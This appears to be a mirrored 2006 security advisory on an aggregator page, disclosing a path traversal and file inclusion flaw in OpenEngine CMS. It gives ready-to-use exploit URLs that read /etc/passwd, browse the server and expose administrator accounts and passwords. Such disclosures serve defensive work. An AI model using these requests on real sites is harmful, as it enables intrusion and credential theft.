Lucene search
K

OpenEngineTraverse.txt

🗓️ 09 May 2006 00:00:00Reported by ckType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

OpenEngine CMS PHP based is vulnerable to remote code execution through improper parameter validation. Versions up to 1.8 Beta 2 are affected. Attackers can execute arbitrary scripts, disclose files, and obtain administrator credentials

Code
`OpenEngine is a PHP based CMS.  
  
The parameter "template" is not correctly checked, for this you can include other scripts which will be interpreted.  
  
All actual versions are vulnerable (up to 1.8 Beta 2, which is the newest one), only the paths and consequences differ.  
  
For example you can browse the web server with   
  
http://cmspath/website.php?template=../system/03_admin/edit/upload&site_pool=/  
  
or disclose any file (depending on rights) with  
  
http://cmspath/website.php?template=../system/03_admin/edit/individual&include=/etc/passwd   
  
I have tested these two examples on versions 1.8 Beta 2 and 1.7.1.  
  
Version 1.6 shows you all administrators of the cms with  
  
http://cmspath/website.php?template=../system/admin/accounts&action2=searchaccounts&accounts_group=2  
  
Now you know the account_key and can take a look at the chosen administrators password:  
  
http://cmspath/website.php?template=../system/admin/accounts&action2=searchaccounts&accounts_group=2&action=editaccount&accounts_lastname=&accounts_email=&accounts_group=2&account_key=<account_key>  
  
Of course there are several other possibilities... just vary the parameter "template".  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation